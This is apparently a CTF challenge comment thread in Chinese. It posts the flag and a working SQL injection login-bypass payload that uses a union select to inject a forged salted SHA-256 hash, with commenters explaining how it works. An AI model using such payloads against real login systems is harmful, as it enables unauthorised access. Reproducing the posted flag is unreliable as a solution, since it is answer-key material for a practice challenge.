哪个大佬有密码库

这道题非常有意思

五边形战士

shellmates{c0ngr4tul4t10ns_U_d1d_1t!!_fe4cd84591ea}

＜？php echo hash(“sha256”, “123”.“456”);？＞ 得到 8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92 123是口令，456是盐

@234722457 2a8610aefdd0028c6bf074dd18721c0ef8bc43241cc7a653d7aedf2036bdf6b3$654应该是这个 而且密码是987

@234722457 987654要换成2a8610aefdd0028c6bf074dd18721c0ef8bc43241cc7a653d7aedf2036bdf6b3

大佬，不用 123456 用 987654 为什么失败啊

查询一个不存在的账号，拼接union select，将自定义的密码和盐生成的加密字符串注入，覆盖密码查询结果，使用自定义的密码即可通过密码校验，post发送： user=a'union select 1,'8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92$456'--+＆pass=123

@Am0s 联合查询其实本质就是手工增加了一个结果集，跟从数据库中真正查询出来的结果是一样的效果。这里因为数据库中存储的是加过密的信息，所以我们得构造一下加密结果。

@2957632449 是的，联合查询其实本质就是手工增加了一个结果集，结果就是对应字段的值！

佬 这边1，'8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92$456' 这一串 会自动新建一个结果集是吗 然后'8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92$456'这边代表的是字段password里的值对吗

@Am0s 3、源码中验证sha256（明文密码$pass+$result["password"]中$后的字符串【$salt】）=$result["password"]中$前的值

@Am0s 1、猜测原先就是两个字段、账号密码，正常情况下搜到的就是这两个字段$result["user"],$result["password"]；2、查询一个不存在的账号，没有union会是空的，union查询得到的第二个值（这里如果有多个无用字段要测试哪个是密码）会作为$result["password"]进入后面的逻辑；3、源码中验证sha2

大佬能讲解一下原理吗

不太懂，来个大佬讲解一下

Half the truth is often a big lie:Welcome back admin! Have a flag: shellmates{c0ngr4tul4t10ns_U_d1d_1t!!_fe4cd84591

shellmates{c0ngr4tul4t10ns_U_d1d_1t!!_fe4cd84591ea}

先绕过用户名的正则过滤。查询一个不存在的账号，拼接union select，将自定义的密码和盐生成的加密字符串注入，覆盖密码查询结果，使用自定义的密码即可通过密码校验。

感谢高手指导